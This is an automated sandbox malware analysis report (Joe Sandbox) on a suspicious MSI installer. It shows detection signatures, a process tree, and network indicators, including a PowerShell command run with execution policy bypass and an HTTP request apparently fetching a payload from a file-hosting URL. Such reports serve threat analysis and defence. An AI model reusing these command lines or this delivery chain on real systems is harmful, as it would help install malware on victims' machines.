Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2024.0198840 298135.msi

Overview

General Information

Sample name:2024.0198840 298135.msi
Analysis ID:1471217
MD5:f316aec665bed01d909032716dc813d4
SHA1:225efa49e02093d3110b5d36d9fc259135fae33a
SHA256:b018842cb1708e4a80d0dfb8bf81ecf0e638aa652989e160e6bd8903e25f9e0c
Tags:msi
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Yara detected MalDoc
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
PE file contains section with special chars
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Writes many files with high entropy
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious MsiExec Embedding Parent
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • msiexec.exe (PID: 6212 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\2024.0198840 298135.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6500 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 5956 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • powershell.exe (PID: 7128 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WebExperienceHostApp.exe (PID: 7372 cmdline: "C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe" MD5: 53AB9B8198E8AD8D3A043F40E72B1AB1)
          • chrome.exe (PID: 7480 cmdline: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe MD5: D09B0BCEAACCB0B4C2FC6B95B9A5241A)
            • WerFault.exe (PID: 7552 cmdline: C:\Windows\system32\WerFault.exe -u -p 7480 -s 576 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2024.0198840 298135.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    2024.0198840 298135.msiJoeSecurity_MalDocYara detected MalDocJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Config.Msi\53e56c.rbsJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Windows\Installer\MSIE83E.tmpJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          C:\Windows\Installer\53e56a.msiJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            C:\Windows\Installer\53e56a.msiJoeSecurity_MalDocYara detected MalDocJoe Security
              SourceRuleDescriptionAuthorStrings
              Process Memory Space: powershell.exe PID: 7128JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                SourceRuleDescriptionAuthorStrings
                amsi32_7128.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5956, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7128, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5956, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7128, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5956, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7128, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5956, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7128, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5956, ParentProcessName: msiexec.exe, ProcessCommandLine: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.", ProcessId: 7128, ProcessName: powershell.exe
                  No Snort rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dllVirustotal: Detection: 7%Perma Link
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\vcruntime140_1_app.dllVirustotal: Detection: 9%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                  Source: unknownHTTPS traffic detected: 151.101.129.138:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1878193789.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2003874167.00007FF74CE20000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.6.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: 2024.0198840 298135.msi, 53e56a.msi.1.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: 2024.0198840 298135.msi, 53e56a.msi.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\vccorlib140_app.amd64.pdb source: vccorlib140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D38A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmp, msvcp140_app.dll.1.dr
                  Source: Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000006.00000000.1832671462.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
                  Source: Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000006.00000000.1832671462.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\vccorlib140_app.amd64.pdbGCTL source: vccorlib140_app.dll.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmp, vcruntime140_app.dll.1.dr
                  Source: Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
                  Source: Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
                  Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: B.pdb source: external_extensions_0000x.57.6.dr
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 2024.0198840 298135.msi, MSIE7DF.tmp.1.dr, MSIE770.tmp.1.dr, MSIE6C2.tmp.1.dr, MSIE790.tmp.1.dr, MSIE740.tmp.1.dr, 53e56a.msi.1.dr
                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\WerFault.exeFile opened: c:Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028A230 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,6_2_00007FFE0028A230

                  Networking

                  barindex
                  Source: Yara matchFile source: 2024.0198840 298135.msi, type: SAMPLE
                  Source: Yara matchFile source: C:\Windows\Installer\53e56a.msi, type: DROPPED
                  Source: global trafficHTTP traffic detected: GET /files/1CRUSWG253MBK5OSUBRDH4V033RFFF HTTP/1.1Host: public.adobecc.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 151.101.129.138 151.101.129.138
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /files/1CRUSWG253MBK5OSUBRDH4V033RFFF HTTP/1.1Host: public.adobecc.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: public.adobecc.com
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: powershell.exe, 00000003.00000002.1842771610.0000000007653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: chrome.exe.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/800-67-rev1/SP-800-67-rev1-2_July-2011.pdf
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://csrc.nist.gov/publications/drafts/fips180-4/Draft-FIPS180-4_Feb2011.pdf
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://csrc.nist.gov/publications/fips/fips46-3/fips46-3.pdf
                  Source: chrome.exe, 00000007.00000002.1998537759.0000000064471000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                  Source: powershell.exe, 00000003.00000002.1840493545.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: WebExperienceHostApp.exe, 00000006.00000003.1871655421.00007DF4D38C0000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000002.1881441167.000001840D945000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1848678381.00007DF4D3910000.00000004.00001000.00020000.00000000.sdmp, WebExperienceHostApp.exe, 00000006.00000003.1842396740.00007DF4D38DF000.00000004.00001000.00020000.00000000.sdmp, chrome.exe.6.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: powershell.exe, 00000003.00000002.1836238055.0000000004F36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000003.00000002.1836238055.00000000054C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://public.adobecc.com
